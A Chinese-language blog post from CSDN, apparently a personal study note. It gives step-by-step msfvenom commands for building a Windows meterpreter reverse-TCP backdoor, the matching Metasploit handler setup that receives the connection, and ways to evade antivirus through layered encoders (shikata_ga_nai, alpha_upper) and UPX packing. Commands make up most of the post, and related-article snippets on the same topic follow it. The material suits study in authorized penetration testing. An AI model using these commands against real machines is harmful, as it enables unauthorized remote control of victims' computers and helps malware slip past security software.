msfvenom制作主控与被控端

已于 2022-07-28 15:04:34 修改
阅读量357 收藏
点赞数 1
分类专栏: 网络安全 文章标签: msfvenom upx encoder
于 2022-07-28 14:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angleoldhen/article/details/126019023
版权
  • msfconsole
  • msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe

说明:-p或--payload 后面接载荷 查看msf都有哪些载荷可以通过 msfvenom -l payloads 命令

           lhost 填写主控端IP     lpost填写主控端端口

          -f 或 --format  接输出文件的格式

         -o 或 --out  指定文件存放路径

         --payload-options   //列举payload的标准参数项

        --help-formats      //列举msf支持的输出文件格式

关于msfvenom更详细参数使用可以参看:Metasploit——msfvenom免杀木马_小白白@的博客-CSDN博客_msfvenom免杀

生成的payload.exe采用各种方法存放在被控端

在主控端msfconsole下执行

  •             use exploit/multi/handler
  •             set payload windows/meterpreter/reverse_tcp  //需要与生成被控端时的payload一致
  •             set lhost 192.168.107.135
  •             set lport 5000  //这两条须与生成被控端时设置的主控端IP和端口一致
  •             exploit

被控端执行payload.exe后,在主控端可以看到信息:

此时主控端与被控端建立连接 。但是由于这个工具被用烂了,一般生成的被控端都会被查杀,所以通常都会对被控端进行重编码。

msf框架里的编码功能可以对被控端进行重新编码,多次编码,多种方式混合编码

执行 msfvenom -l encoder 可以查看编码器列表,excellent级的编码器效果更好

  • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c

此处输出格式选C,可以在屏幕上看到编码结果,想了解多次、混合编码效果可以输出这种格式,比较low的编码出来的代码是不变的,如上例。

  • msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe

上面的命令 -i 10 表示编码10,混合编码要写多次msfvenom用并|分隔 

第二种编码不能缺--platform Windows,会执行不下去,第一种编码写不写都会报错,但是可以继续执行,原因暂不明

 即使多次编码了,还是多半也被查出来,此时可以采用“加壳”的办法

upx /var/payload.exe

本文仅仅只是记录思路和命令,如上操作的被控端绝大部分还是会被查杀

angleoldhen
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用msfvenom生成被并进行远程
2301_78429157的博客
06-29 493
传送payload 将生成的payload文件(payload.exe)传送到目标机器上。在网络安全领域中,远程制是一项常见的技术,它允许安全专业人员模拟攻击并评估系统的安全性。远程制 一旦连接建立成功,你将获得一个Meterpreter Shell,可以在目标机器上执行各种操作和命令。执行payload 在目标机器上执行payload文件。一旦执行成功,它将尝试连接本地机器上的Metasploit监听器。生成payload 首先,我们需要使用msfvenom生成恶意的payload。
远程制目标主机
qq_38243607的博客
07-10 2044
目录 远程制程序基础 实战:远程制目标主机 工具使用 msfvenom msfconsole 远程制程序基础 远程制程序可以说是一个框架,指可以在一台设备上操纵另一台设备。它包括被主控,被是运行在目标主机上的程序,可以是一段代码也可以是一个直接执行的程序,含义上等同于木马;主控在攻击机上执行。 根据主控和被的连接方式,可以将远程制软件分为正向和反向。 这里主要介绍一下反向制,大部分的远程制软件都采用远程制的方式。当目标主机执行被后...
使用msfvenom实现远程制.
2301_78457119的博客
06-24 693
在Kali 2中生成被的工具:msfvenommsfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1863
主要介绍msfvenom 和一些实验
2020-12-03
weixin_45870307的博客
12-03 525
msf生成的payload的简单免杀 通常利用msf生成的payload在不做任何处理的情况下会被杀软直接干掉,所有需要进行一些操作来进行免杀。 这里我使用的是大蜘蛛杀毒软件来做的实验 msf内置编码器 输入msfvenom -l encoders 会出现msf提供的几种编码方式,使用这些编码对payload进行编码 msfvenom - p windows/shell/reverse_tcp -lhsot 本机ip -lport 口 -e 编码方式 -i 编码次数 -f 文件格式 -o 文件路径与名称
攻击篇--远程制(一)生成被主控
qq_40424448的博客
06-03 4562
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200口打开一个连接,可以实现攻击者对目标主机的制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程制。 netcat ......
免杀学习笔记-msfvenom工具介绍(一)
m0_49025459的博客
04-04 360
msfvenom是msfpayload和msfencode的结合体,于2015年6⽉8⽇取代了msfpayload和msfencode。在此之后,metasploit-framework下⾯的的 msfpayload(荷载⽣成器),msfencoder(编码器),msfcli(监听接⼝)都不再被⽀持。
Msfvenom生成后门及运用
Tauil的博客
08-04 451
代码】Msfvenom生成后门及运用。
完整版被.rar
04-03
5. **安装脚本或指南**:指导用户如何正确安装和配置被,确保与主控的连接顺畅。 6. **许可证文件**:如果是商业软件,可能会包含许可证文件,确认用户有权使用该软件。 7. **更新工具**:有时会包含一个...
天易成网管 v5.70 被
11-06
《天易成网管v5.70被:深入了解局域网监与管理》 天易成网管是一款专业且知名的上网行为管理软件,它专为公司和局域网环境设计,致力于提供全面、高效的网络监和管理解决方案。在信息化日益普及的时代,...
华众HZHost被安装图文教程
10-01
【华众HZHost被安装教程详解】 华众HZHost是一款专业的...正确执行这些步骤将确保被能与主控顺利通信,提供稳定的服务。在整个过程中,要注意软件的兼容性、安全性和数据保护,以确保服务器的高效管理。
智能制云台主控与驱动电路
01-20
另一类是以两个交流或直流电机组成的安装平台,通过制系统在远可以制其水平和垂直方向的转动,实现全方位监,这样的云台制起来费时费力,不节能。为此,在做一定的市场调研后,结合已有技术设计出一款基于...
主控升级的常见问题
10-01
在IT系统管理中,主控(Master)与受(Slave)的架构常见于远程制、集群管理、数据库同步等场景。当涉及到主控与受的升级时,确保系统的稳定运行和功能兼容性至关重要。以下是对标题和描述中提及的...
Metasploit Framework(MSF)基础框架
weixin_51151498的博客
02-12 3329
MSF使用
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
weixin_43287317的博客
03-28 6045
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
msfvenom常用参数
m0_61506558的博客
08-29 1537
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 4748
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
Kali Linux Armitage生成被主控
xujing19920814的博客
10-02 755
使用 Armitage生成被主控
51单片机I2C总线:主控与被器件详解
本资源是一份关于C51单片机10课件,主题聚焦于I2C总线技术。I2C(Inter-Integrated Circuit Bus,即集成电路总线)是一种由Philips公司于1987年推出的简单、高效的双向二线制同步串行通信协议。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值